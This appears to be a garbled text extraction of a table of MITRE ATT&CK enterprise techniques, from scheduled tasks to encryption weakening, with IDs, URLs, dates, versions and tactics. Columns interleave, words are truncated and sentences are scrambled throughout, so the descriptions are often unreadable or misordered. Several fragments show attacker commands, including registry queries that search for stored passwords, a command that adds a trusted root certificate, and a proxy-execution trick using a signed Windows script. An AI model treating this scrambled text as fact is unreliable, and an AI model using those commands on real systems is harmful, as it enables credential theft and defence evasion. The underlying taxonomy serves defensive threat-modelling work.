may also 27 Novemb
create "hidden"13 Octoberenterprise-1.6
scheduled tasks (i.e. [Hide Execution,
Artifacts](https://attack.mitr
T1053.006attack-pat Scheduled An adversary https://attack.mitre.org/techniques/T1053/006
may use12 October15
systemd timersOctoberenterprise-1.2
to execute malicious code Execution,
at system startup or on a sch
T1029 attack-pat Scheduled When
Adversaries https://attack.mitre.org/techniques/T1029
scheduled
may attempt31 May
exfiltration is20used,
to take 28 March
other
screen enterprise-1.1
exfiltration
captures desktop Exfiltration
of thetechniques tolikely
gatherapply as well toover
information transf
th
T1113 attack-pat Screen Cap https://attack.mitre.org/techniques/T1113
31 May 20 30 March enterprise-1.1 Collection
T1597 attack-pat Search Clo Adversarieshttps://attack.mitre.org/techniques/T1597
may search 02 in
October04
different Octoberenterprise-1.1
closed databases depending Reconnaiss
on what information they see
T1597.002attack-pat Search Clo Adversarieshttps://attack.mitre.org/techniques/T1597/002
02 October15
may purchase information Aprilabout
20enterprise-1.0 Reconnaiss
their already identified targets, or use purchased
T1597.001attack-pat Search ClosAdversarieshttps://attack.mitre.org/techniques/T1597/001
may search 02 in
October15
private threat April 20enterprise-1.0
intelligence vendor dataReconnaiss
to gather actionable inform
T1596 attack-pat Search OpeAdversarieshttps://attack.mitre.org/techniques/T1596
may search 02 in different Octoberenterprise-1.0
October18 open databases depending on what information they seek
Reconnaiss
T1596.004attack-pat Search Ope Adversaries may search CDN data to gather
https://attack.mitre.org/techniques/T1596/004 actionable
02 October15 April 20enterprise-1.0 information. Threat actors can use onl
Reconnaiss
T1596.001attack-pat Search OpeAdversarieshttps://attack.mitre.org/techniques/T1596/001
may search 02 DNS data toApril
October15 gather actionable information.
20enterprise-1.0 Threat actors can query n
Reconnaiss
T1596.003attack-pat Search OpenAdversarieshttps://attack.mitre.org/techniques/T1596/003
may search 02 digital
October15 certificate data to gather actionable
April 20enterprise-1.0 information. Threat actors
Reconnaiss
T1596.005attack-pat Search OpeAdversarieshttps://attack.mitre.org/techniques/T1596/005
may search 02 scan databases
October15 Aprilto gather actionable information.
20enterprise-1.0 Reconnaiss Threat actors can us
T1596.002attack-pat Search Ope Adversaries may search WHOIS data to gather
https://attack.mitre.org/techniques/T1596/002
02 October15 April 20enterprise-1.0 actionable information.
Reconnaiss actors can use o
Threat
T1593 attack-pat Search Op Adversarieshttps://attack.mitre.org/techniques/T1593
may search 02 in different Septementerprise-1.1
October12 online sites depending on what information they seek to g
Reconnaiss
T1593.003attack-pat Search Ope**Note:** https://attack.mitre.org/techniques/T1593/003
This is distinct from [Code
09 August Repositories](https://attack.mitre.org/techniques/T1213
26 Octoberenterprise-1.0 Reconnaiss
T1593.002attack-pat Search OpeAdversarieshttps://attack.mitre.org/techniques/T1593/002
may craft02 various
October12searchSeptementerprise-1.0
engine queries depending on Reconnaiss
what information they see
T1593.001attack-pat Search OpeAdversarieshttps://attack.mitre.org/techniques/T1593/001
may search 02 in
October15
different April social20enterprise-1.0
media sites depending Reconnaiss
on what information they se
T1594 attack-pat Search Vic In additionhttps://attack.mitre.org/techniques/T1594
to manually 02browsing
October02 the
Octoberenterprise-1.1
website, adversaries may attemptReconnaiss to identify hidden dire
T1505 attack-pat Server Sof Adversarieshttps://attack.mitre.org/techniques/T1505
28 June 2019 Octoberenterprise-1.4 Persistenc
T1505.004attack-pat Server Sof Adversarieshttps://attack.mitre.org/techniques/T1505/004
may also 03install
Junemalicious
2017 Octoberenterprise-1.0
IIS modules to observe and/or Persistenc
modify traffic. IIS 7.0 intr
T1505.001attack-pat Server Sof Microsoft SQLhttps://attack.mitre.org/techniques/T1505/001
Server can
12 Decemb
enable15 common
Octoberenterprise-1.1
language runtime (CLR)Persistenc
integration. With CLR integ
T1505.005attack-pat Server Sof Adversarieshttps://attack.mitre.org/techniques/T1505/005
may modify 28 and/or
March replace
12 Septementerprise-1.0
the Terminal Services DLLPersistenc
to enable persistent access
T1505.002attack-pat Server Sof Adversarieshttps://attack.mitre.org/techniques/T1505/002
may register 12 Decemb
a malicious
18 Octoberenterprise-1.0
transport agent to provide aPersistenc
persistence mechanism in E
T1505.003attack-pat Server Sof In additionhttps://attack.mitre.org/techniques/T1505/003
13 Decemb
to a server-side script,16a April
Web 20enterprise-1.4 Persistencprogram that is use
shell may have a client interface
T1648 attack-pat Serverless Serverless functions
https://attack.mitre.org/techniques/T1648
27 May
can also be20 invoked
14 Octoberenterprise-1.1
in response to cloud events Execution
(i.e. [Event Triggered Exe
T1489 attack-pat Service StoAdversarieshttps://attack.mitre.org/techniques/T1489
29 March
may accomplish this12byOctoberenterprise-1.2
disabling individual services of Impact
high importance to an orga
T1129 attack-pat Shared MoThe Windows https://attack.mitre.org/techniques/T1129
module31 May can
loader 20 12beOctoberenterprise-2.2
instructed to load DLLs fromExecution arbitrary local paths and arb
T1072 attack-pat Software DThe permissions
https://attack.mitre.org/techniques/T1072
31 May
required 20 25action
for this Septementerprise-3.1
vary by system configuration; Execution,
local credentials may b
T1518 attack-pat Software DAdversarieshttps://attack.mitre.org/techniques/T1518
may attempt 16 Septem16
to enumerate Aprilsoftware
20enterprise-1.4 Discoverysuch as figuring out
for a variety of reasons,
T1518.001attack-pat Software DiAdversaries
* Uploading https://attack.mitre.org/techniques/T1518/001
may
malwarealso 21 Februar16
utilize
or tools the AprilAPI](https://attack.mitre.org/techniques/T1059/009)
to[Cloud
a location 20enterprise-1.5
accessible to a victim Discovery
network to enable [Ingress Tt
T1608 attack-pat Stage Capab * Installinghttps://attack.mitre.org/techniques/T1608
a previously 17acquired
March 19 Octoberenterprise-1.2
SSL/TLS certificate to use to encrypt Resource
command and control t
T1608.004attack-pat Stage Capab Adversarieshttps://attack.mitre.org/techniques/T1608/004
may purchase domains
17 March similar
15 April to legitimate domainsResource
20enterprise-1.3 (ex: homoglyphs, typosquatti
T1608.003attack-pat Stage CapabiAdversarieshttps://attack.mitre.org/techniques/T1608/003
can obtain17digital
Marchcertificates (see [Digital Certificates](https://attack.mitre.org/te
16 Octoberenterprise-1.1 Resource
T1608.005attack-pat Stage Capab Adversarieshttps://attack.mitre.org/techniques/T1608/005
may also 17 useMarch
free or16 paid accounts on link shorteningResource
Octoberenterprise-1.4 services and Platform-as-a-S
T1608.006attack-pat Stage Capab SEO poisoning may also 30 be combined with evasive
https://attack.mitre.org/techniques/T1608/006
Septem14 August redirects and other
enterprise-1.1 Resourcecloaking mechanisms (s
Developmen
T1608.001attack-pat Stage CapaAdversarieshttps://attack.mitre.org/techniques/T1608/001
may upload 17 backdoored files, such as application binaries,
March 16 Octoberenterprise-1.2 Resource virtual machine images
T1608.002attack-pat Stage Capab Adversarieshttps://attack.mitre.org/techniques/T1608/002
can avoid17 theMarch
need to 20upload a tool by having compromised
Octoberenterprise-1.2 Resourcevictim machines dow
T1528 attack-pat Steal Appli https://attack.mitre.org/techniques/T1528
04 Septem14 Octoberenterprise-1.4 Credential
T1539 attack-pat Steal Web After an adversary acquires a valid cookie,
https://attack.mitre.org/techniques/T1539
08 October14 they can then performCredential
Octoberenterprise-1.4 a [Web Session Cookie](http
T1649 attack-pat Steal or Fo Adversaries
On Windows, https://attack.mitre.org/techniques/T1649
whothehave 03
access
built-inAugust to root
14 Octoberenterprise-1.2
(or subordinate)
<code>klist</code> CAbe
utility can certificate
Credential
used to private
list keys
Access
and analyze(orcached
mechanisKe
T1558 attack-pat Steal or Fo https://attack.mitre.org/techniques/T1558
11 Februar17 Septementerprise-1.6 Credential
T1558.004attack-pat Steal or Fo Cracked hashes
https://attack.mitre.org/techniques/T1558/004
may enable
24 August[Persistence](https://attack.mitre.org/tactics/TA0003),
15 Octoberenterprise-1.1 Credential [Privilege
T1558.005attack-pat Steal or Fo Adversarieshttps://attack.mitre.org/techniques/T1558/005
can collect 17tickets
Septem14 fromOctoberenterprise-1.0
ccache files stored on disk and Credential
authenticateAccess
as the curren
T1558.001attack-pat Steal or Fo The KDC service
https://attack.mitre.org/techniques/T1558/001
runs all
11 on
Februar05
domain Novemb
controllers enterprise-1.1
that are part of anCredential
Active Directory domain. KR
T1558.003attack-pat Steal or Fo Cracked hashes
https://attack.mitre.org/techniques/T1558/003
may enable
11 Februar23
[Persistence](https://attack.mitre.org/tactics/TA0003),
Septementerprise-1.2 Credential [Privilege
T1558.002attack-pat Steal or Fo Password hashes
https://attack.mitre.org/techniques/T1558/002
11 Februar25
for target servicesMarch
may beenterprise-1.0 CredentialDumping](https://a
obtained using [OS Credential
T1553 attack-pat Subvert TruAdversarieshttps://attack.mitre.org/techniques/T1553
may attempt 05 Februar01
to subvertMarchthese trustenterprise-1.2
mechanisms. TheDefense
methodEv adversaries use wil
T1553.002attack-pat Subvert TruCode signing https://attack.mitre.org/techniques/T1553/002
certificates05 Februar22
may be used Septementerprise-1.1
to bypass security policies Defense
that requireEv signed code to e
T1553.006attack-pat Subvert TruTo gain access
https://attack.mitre.org/techniques/T1553/006
to kernel23 memory
April 2005 toMay
modify20 enterprise-1.0 Defense checks,
variables related to signature Ev such as mod
T1553.001attack-pat Subvert Tr Applications https://attack.mitre.org/techniques/T1553/001
and files 05 Februar21
loaded onto theOctoberenterprise-1.2
system from a USB flash drive, Defense Ev disk, external har
optical
T1553.004attack-pat Subvert TruIn macOS, thehttps://attack.mitre.org/techniques/T1553/004
Ay MaMi 21 malware
Februar04 Januaryenterprise-1.2
uses Defense Ev
<code>/usr/bin/security add-trusted-cert -d -r trustRoo
T1553.005attack-pat Subvert Tr Adversarieshttps://attack.mitre.org/techniques/T1553/005
may abuse 22container
Februar22filesMarchsuch enterprise-1.1
as compressed/archive Defense Ev and/or disk ima
(.arj, .gzip)
T1553.003attack-pat Subvert TruHijacking SIP or trust provider components
https://attack.mitre.org/techniques/T1553/003
05 Februar05 can also enable persistent
May 20 enterprise-1.0 Defensecode Evexecution, since th
T1195 attack-pat Supply Cha While supply chain compromise can impact
https://attack.mitre.org/techniques/T1195 any
18 April 2004 Octoberenterprise-1.6 component of hardware
Initial Acce software, adversa
or
T1195.003attack-pat Supply ChaAdversarieshttps://attack.mitre.org/techniques/T1195/003
11 March 28 April 20enterprise-1.1 Initial Acce
T1195.001attack-pat Supply ChaTargeting may be specific to a desired victim
https://attack.mitre.org/techniques/T1195/001
11 March 13 April set or may be distributed
20enterprise-1.2 Initial to a broad set of consu
Acce
T1195.002attack-pat Supply ChaTargeting may be specific to a desired victim
https://attack.mitre.org/techniques/T1195/002
11 March 28 April set or may be distributed
20enterprise-1.1 Initial to a broad set of consu
Acce
T1218 attack-pat System Bin Similarly, on Linux systems adversaries may
https://attack.mitre.org/techniques/T1218 abuse
18 April 2001 March enterprise-3.1 trusted binaries
Defense Ev<code>split</code
such as
T1218.003attack-pat System BinCMSTP.exehttps://attack.mitre.org/techniques/T1218/003
can also be 23abused
January12 to [Bypass User Account Control](https://attack.mitre.org/tech
Septementerprise-2.1 Defense Ev
T1218.001attack-pat System BinA custom CHM file containing embedded payloads could be delivered
https://attack.mitre.org/techniques/T1218/001
23 January18 Octoberenterprise-2.1 Defenseto aEvvictim then triggere
T1218.002attack-pat System BinAdversarieshttps://attack.mitre.org/techniques/T1218/002
may also 23 rename
January11
malicious
March DLLenterprise-2.0
files (.dll) with ControlDefense
Panel file
Ev extensions (.cpl)
T1218.015attack-pat System Bina Adversarieshttps://attack.mitre.org/techniques/T1218/015
may also 07 execute
Marchmalicious
15 Aprilcontent
20enterprise-1.0
by planting malicious
Defense[JavaScript](https://atta
Evasion
T1218.004attack-pat System Bina InstallUtil may
https://attack.mitre.org/techniques/T1218/004
also be23 used
January11
to bypass March
application
enterprise-2.0
control throughDefense
use of attributes
Ev within the
T1218.014attack-pat System BinAdversarieshttps://attack.mitre.org/techniques/T1218/014
may also 28 abuse
Septem20
MMC toMay execute
20 enterprise-2.0
malicious .msc files.Defense
For example,
Ev adversaries m
T1218.013attack-pat System BinIn additionhttps://attack.mitre.org/techniques/T1218/013
to [Dynamic-link
22 Septem19
Library April
Injection](https://attack.mitre.org/techniques/T1055/001
20enterprise-2.0 Defense Ev
T1218.005attack-pat System BinMshta.exe https://attack.mitre.org/techniques/T1218/005
can be used 23toJanuary11
bypass application
March enterprise-2.0
control solutions that Defense
do notEv account for its pote
T1218.007attack-pat System BinAdversaries
Adversarieshttps://attack.mitre.org/techniques/T1218/007
may
may abuse
abuse 24msiexec.exe
January19 April
odbcconf.exe totolaunch
20enterprise-2.0
bypass local or network
application accessible
Defense
control Ev
solutionsMSIthat
files.
doMsiexec.e
not accou
T1218.008attack-pat System Bin https://attack.mitre.org/techniques/T1218/008
24 January11 March enterprise-2.0 Defense Ev
T1218.009attack-pat System BinBoth utilities https://attack.mitre.org/techniques/T1218/009
may be used23 January11
to bypassMarch enterprise-2.0
application control through useDefense Ev
of attributes within the b
T1218.010attack-pat System BinRegsvr32.exe https://attack.mitre.org/techniques/T1218/010
can also23 beJanuary21
leveragedApril 20enterprise-2.1
to register a COM Object used Defense Ev persistence via
to establish
T1218.011attack-pat System BinAdditionally, https://attack.mitre.org/techniques/T1218/011
adversaries23 January14 Octoberenterprise-2.3 Defense Ev
may use [Masquerading](https://attack.mitre.org/techniques/T1036
T1218.012attack-pat System Bina Adversarieshttps://attack.mitre.org/techniques/T1218/012
may abuse 10verclsid.exe
August 20 May 20 enterprise-2.0
to execute malicious payloads. Defense
This mayEv be achieved by ru
T1082 attack-pat System Inf Infrastructurehttps://attack.mitre.org/techniques/T1082
31 May
as a Service 20 15
(IaaS) Octoberenterprise-2.5
cloud providers such as AWS, GCP, Discovery
and Azure allow access to
T1614 attack-pat System LocAdversarieshttps://attack.mitre.org/techniques/T1614
may also 01 April 2015
attempt Octoberenterprise-1.1
to infer the location of a victim host Discovery
using IP addressing, such a
T1614.001attack-pat System LocOn a macOS https://attack.mitre.org/techniques/T1614/001
18 August
or Linux system, 15 Octoberenterprise-1.0
adversaries Discovery to retrieve the valu
may query <code>locale</code>
T1016 attack-pat System NetAdversarieshttps://attack.mitre.org/techniques/T1016
may use the 31 May 20 28 July
information 20 [System
from enterprise-1.6 Discovery Discovery](https://
Network Configuration
T1016.001attack-pat System NetAdversaries may use
On Linux, names and the results and
passwords responses
https://attack.mitre.org/techniques/T1016/001
17 March 25 March
of all from these
enterprise-1.0
Wi-Fi-networks requests
a device to determine
Discovery
has previously if the system
connected to m
T1016.002attack-pat System Net https://attack.mitre.org/techniques/T1016/002
08 Septem05 Octoberenterprise-1.0 Discovery
T1049 attack-pat System NetUtilities andhttps://attack.mitre.org/techniques/T1049
commands 31that
Mayacquire this information include [netstat](https://attack.mitre.or
20 06 Septementerprise-2.4 Discovery
T1033 attack-pat System Own On networkhttps://attack.mitre.org/techniques/T1033
devices, [Network
31 May 20Device CLI](https://attack.mitre.org/techniques/T1059/008)
29 Septementerprise-1.5 Discovery co
T1216 attack-pat System ScrAdversarieshttps://attack.mitre.org/techniques/T1216
18 April 2018 April 20enterprise-2.0 Defense Ev
T1216.001attack-pat System ScrIn later versions of Windows (10+), April
<code>PubPrn.vbs</code>
https://attack.mitre.org/techniques/T1216/001
03 Februar18 20enterprise-2.0 has been updated
Defense Ev to prevent p
T1216.002attack-pat System Scr`SyncAppvPublishingServer.vbs06 Februar12 "n; {PowerShell}"`
https://attack.mitre.org/techniques/T1216/002
Septementerprise-1.0 Defense Evasion
T1007 attack-pat System SerAdversarieshttps://attack.mitre.org/techniques/T1007
may use the information
31 May 20 03 Aprilfrom [System Service Discovery](https://attack.mitre.org
20enterprise-1.5 Discovery
T1569 attack-pat System SerAdversaries
Adversarieshttps://attack.mitre.org/techniques/T1569
use launchctl10 March 20 Septementerprise-1.3
to execute commands and programs asExecution [Launch Agent](https://atta
T1569.001attack-pat System Serv https://attack.mitre.org/techniques/T1569/001
10 March 20 Septementerprise-1.2 Execution
T1569.002attack-pat System Serv Adversarieshttps://attack.mitre.org/techniques/T1569/002
may leverage 10 March
these mechanisms
15 Octoberenterprise-1.2
to execute malicious Execution
content. This can be done b
T1529 attack-pat System Sh Adversarieshttps://attack.mitre.org/techniques/T1529
may attempt 04 October22
to shutdown/reboot
March enterprise-1.3
a system after impacting
Impact it in other ways, such
T1124 attack-pat System TimThis information
https://attack.mitre.org/techniques/T1124
could31beMay useful
20 16
forApril
performing
20enterprise-1.4
other techniques,Discovery
such as executing a file with
T1080 attack-pat Taint Shar Adversarieshttps://attack.mitre.org/techniques/T1080
may also 31 compromise
May 20 15sharedOctoberenterprise-1.5
network directories throughLateralbinary
M infections by ap
T1221 attack-pat Template I This techniquehttps://attack.mitre.org/techniques/T1221
may also17 enable
October12 Januaryenterprise-1.3
[Forced Defense Ev
Authentication](https://attack.mitre.org/techniques/
T1205 attack-pat Traffic SignAdversarieshttps://attack.mitre.org/techniques/T1205
may also 18 useApril 2019 Octoberenterprise-2.4
the Wake-on-LAN Command
feature to turn on powered an
off systems. Wake-on
T1205.001attack-pat Traffic Sig The observation
https://attack.mitre.org/techniques/T1205/001
of the01signal
July 20 11 March
packets enterprise-1.1
to trigger the communication Command an
can be conducted through
T1205.002attack-pat Traffic SignFilters can be
https://attack.mitre.org/techniques/T1205/002
installed30onSeptem20 Octoberenterprise-1.0
any Unix-like Command
platform with `libpcap` installed anWindows hosts
or on
T1537 attack-pat Transfer D Incidents havehttps://attack.mitre.org/techniques/T1537
30 Augustwhere
been observed 15 Octoberenterprise-1.5
adversaries have created backups Exfiltration
of cloud instances and
T1127 attack-pat Trusted Dev Adversarieshttps://attack.mitre.org/techniques/T1127
31 May 20 05 May 20 enterprise-1.2 Defense Ev
T1127.002attack-pat Trusted Dev Additionally,https://attack.mitre.org/techniques/T1127/002
09 Septem17
an adversary can moveOctoberenterprise-1.0
the ClickOnce application fileDefense Evasion
to a remote user’s startup f
T1127.001attack-pat Trusted Dev Adversarieshttps://attack.mitre.org/techniques/T1127/001
can abuse27MSBuild
March to 14proxy
August execution of malicious code.
enterprise-1.3 Defense The Ev
inline task capability
T1199 attack-pat Trusted Rel In Office 365 environments, organizations
https://attack.mitre.org/techniques/T1199 may
18 April 2015 Octoberenterprise-2.4grant Microsoft partners
Initial Acceresellers delegated
or
T1552 attack-pat UnsecuredAdversarieshttps://attack.mitre.org/techniques/T1552
04 Februar14 Octoberenterprise-1.4 Credential
T1552.003attack-pat UnsecuredAdversarieshttps://attack.mitre.org/techniques/T1552/003
04 Februar12 Septementerprise-1.2 Credential
T1552.008attack-pat UnsecuredRather
The de than
factoaccessing the stored
March
across 14
cloud chat logs (i.e.,
https://attack.mitre.org/techniques/T1552/008
standard14 [Credentials
Octoberenterprise-1.1
service providers In the
is to host Files](https://attack.mitre.org/
Credential
Instance Access
Metadata API at <
T1552.005attack-pat Unsecured https://attack.mitre.org/techniques/T1552/005
11 Februar15 Octoberenterprise-1.4 Credential
T1552.007attack-pat UnsecuredAn adversary may access the Docker API to collect logs that contain
https://attack.mitre.org/techniques/T1552/007
31 March 15 Octoberenterprise-1.2 credentials to cloud, cont
Credential
T1552.001attack-pat UnsecuredIn cloudMachine
*CLocal and/or containerized environments,HKLMauthenticated
https://attack.mitre.org/techniques/T1552/001
Hive:04 Februar15
<code>reg /f password /tuser
Octoberenterprise-1.2
query and service
Credential
REG_SZ /s</code>account credenti
T1552.002attack-pat Unsecured*On CCurrent User
https://attack.mitre.org/techniques/T1552/002
the SYSVOL Hive:
share,<code>reg
04 Februar15
adversaries query
Octoberenterprise-1.1
may HKCU
use the/f password /t REG_SZ
following command Credential
/s</code>
to enumerate potential GP
T1552.006attack-pat Unsecured https://attack.mitre.org/techniques/T1552/006
11 Februar15 August enterprise-1.1 Credential
T1552.004attack-pat UnsecuredSomeC private
https://attack.mitre.org/techniques/T1552/004
keys require
04 Februar04
a password Octoberenterprise-1.2
or passphrase for operation, Credential
so an adversary may also u
T1535 attack-pat Unused/Uns An example
Caching https://attack.mitre.org/techniques/T1535
of adversary
alternate 04 Septem14
use of unused
authentication Decemb
material AWS enterprise-1.1
regions
allows is to mine
the system cryptocurrency
Defense
to verify Ev through
an identity [Reso
has successfu
T1550 attack-pat Use Altern https://attack.mitre.org/techniques/T1550
30 January15 Octoberenterprise-1.4 Defense Ev
T1550.001attack-pat Use AlternaDirect API access
https://attack.mitre.org/techniques/T1550/001
through
30 January15
a token negates
Octoberenterprise-1.7
the effectiveness of a second
Defenseauthentication
Ev factor
T1550.002attack-pat Use AlternaAdversarieshttps://attack.mitre.org/techniques/T1550/002
may also 30useJanuary28
stolen password
July 20 hashes
enterprise-1.2
to "overpass the
Defense
hash."EvSimilar to PtH, this i
T1550.003attack-pat Use AlternaAdversarieshttps://attack.mitre.org/techniques/T1550/003
may also 30create
January12
a valid Septementerprise-1.1
Kerberos ticket using other user
Defense
information,
Ev such as stole
T1550.004attack-pat Use Altern There havehttps://attack.mitre.org/techniques/T1550/004
30 January15
been examples of malware Octoberenterprise-1.4
targeting session cookies Defense
to bypassEvmulti-factor authe
T1204 attack-pat User ExecuFor example, https://attack.mitre.org/techniques/T1204
18 April
tech support 2011
scams canNovemb enterprise-1.7
be facilitated Execution
through [Phishing](https://attack.mitre.org
T1204.002attack-pat User ExecutWhile [Malicious
https://attack.mitre.org/techniques/T1204/002
11 March 25 Septementerprise-1.4
File](https://attack.mitre.org/techniques/T1204/002) Execution
frequently occurs shor
T1204.003attack-pat User ExecuAdversarieshttps://attack.mitre.org/techniques/T1204/003
may also 30name Marchimages26 August
a certainenterprise-1.1
way to increase the Execution
chance of users mistakenly d
T1204.001attack-pat User ExecutAn adversarhttps://attack.mitre.org/techniques/T1204/001
11 March 10 Septementerprise-1.1 Execution
T1078 attack-pat Valid Acco The overlap
Cloud https://attack.mitre.org/techniques/T1078
accounts 31 May
of permissions
may also befor 20local,
able 15
to Octoberenterprise-2.7
domain,[Temporary
assume ElevatedDefense
and cloud accounts across aEva
network of systems
Cloud Access](https://attack
T1078.004attack-pat Valid Acco https://attack.mitre.org/techniques/T1078/004
13 March 14 Octoberenterprise-1.8 Defense Eva
T1078.001attack-pat Valid Acco Default accounts
https://attack.mitre.org/techniques/T1078/001
13 March
are not limited 14to Octoberenterprise-1.4 Defense
client machines, rather also include Eva
accounts that are pres
T1078.002attack-pat Valid Acco Adversarieshttps://attack.mitre.org/techniques/T1078/002
may compromise
13 Marchdomain 14 Augustaccounts, some with a highDefense
enterprise-1.4 level of Eva
privileges, through v
T1078.003attack-pat Valid AccouLocal Accounts may also be abused to elevate privileges and harvest
https://attack.mitre.org/techniques/T1078/003
13 March 15 Octoberenterprise-1.4 credentials
Defense Eva through [OS C
T1125 attack-pat Video CaptIn macOS, there are a31few different malware
https://attack.mitre.org/techniques/T1125
May 20 30 March samples that recordCollection
enterprise-1.1 the user's webcam such as F
T1497 attack-pat Virtualiza https://attack.mitre.org/techniques/T1497
17 April 2012 Septementerprise-1.3 Defense Ev
T1497.001attack-pat Virtualiza Hardware checks, such06asMarch
the presence of the fan, temperature, and
https://attack.mitre.org/techniques/T1497/001
12 Septementerprise-2.2 audioEvdevices, could also
Defense
T1497.003attack-pat Virtualiza Adversarieshttps://attack.mitre.org/techniques/T1497/003
may also 06useMarch
time as12 a metric to detect sandboxes and
Septementerprise-1.2 analysis
Defense Evenvironments, pa
T1497.002attack-pat Virtualizat Adversarieshttps://attack.mitre.org/techniques/T1497/002
may search 06 for
Marchuser 12
activity on the host based on variables
Septementerprise-1.1 Defense such
Ev as the speed/freq
T1600 attack-pat Weaken EnAdversarieshttps://attack.mitre.org/techniques/T1600
can compromise
19 October21and manipulate devices that perform
Octoberenterprise-1.0 encryption
Defense Ev of network traffi
